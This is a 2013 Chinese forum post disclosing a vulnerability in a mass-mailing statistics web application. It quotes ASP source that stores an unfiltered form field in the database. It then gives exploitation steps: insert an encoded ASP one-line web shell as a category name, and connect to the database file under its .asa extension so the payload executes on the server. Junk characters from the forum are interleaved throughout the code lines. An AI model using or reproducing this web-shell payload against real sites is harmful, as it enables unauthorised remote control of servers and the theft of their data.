找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1858|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp - }- @" C' m0 P  u& Y, n0 {

/ t& h  X) e  W- N! |IF Request.QueryString("Action")="del" Then
' k7 f! t8 p* B0 D+ ~ID=Request.QueryString("ID")
4 O$ w0 V* m  c5 V) y" a/ rIF Countss ("tui","Fenlei",ID )<>0 then 8 `  ?- l0 N9 U2 z; n, U6 m
'略
4 f+ K: R; U# F: ~( m7 gIF Request.QueryString("Action")="Add" Then
# ^) i: T6 M! s2 RTname=Request.Form("Typename") % J  o1 b% _5 e4 {3 a' U
Set Rs=Server.CreateObject("adodb.Recordset") ' x  f( I: b9 }, w: a- m+ x
Sql="Select * From Fenlei Order by id Desc " " m- ^8 n- e$ c) B$ z6 w
Rs.Open Sql,Conn,1,3
% u$ B; L. t& n# PRs.Addnew ; K7 b0 `1 L. i2 c, d" f) J/ b% d
Rs("Typename")=Tname   `0 V$ Y$ z1 F% J/ ?8 E
'略
1 R- h& G9 u4 h" x9 }8 t: RSet Rs=Server.CreateObject("adodb.Recordset") 0 [) N: ]" i3 d5 g# j+ G! k- l
Sql="Select * From Fenlei Order by id Desc " 6 U) u% R! S& y
Rs.Open Sql,Conn,1,1
( u1 K) |% G: p+ Z, \'略
# f* s6 V  i2 S$ s; E. j%>
* E- B2 f! Z" I
' a5 J4 T2 @" M% F! r. ^+ o
$ P1 I2 ?& o$ M* ` - J3 Y) T7 j  T+ I8 g, ]
没有过滤,直接写入数据库。+ P  R4 r, G- f2 i5 k
( i  m5 R2 ?7 y
利用方法:
! ^# z- Z0 h7 N. [5 \/ G, x
- e" P' U5 U9 @$ E% I( R; n插入:┼攠數畣整爠煥敵瑳∨≡┩>$ h8 j2 a- z$ {9 X: k0 y6 t$ m
; }# B- b4 O) E& ~+ S

( v+ A) N4 m# A8 j/ d连接: http://www.xxx.com/###tongbaner.asa - s' S4 ~( }6 I0 d8 o& }
'默认安装文件: * ]" `3 g1 y7 B: R4 |
'install.asp, @7 |* O- U. {3 L# f( T6 n4 ^! ^3 v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表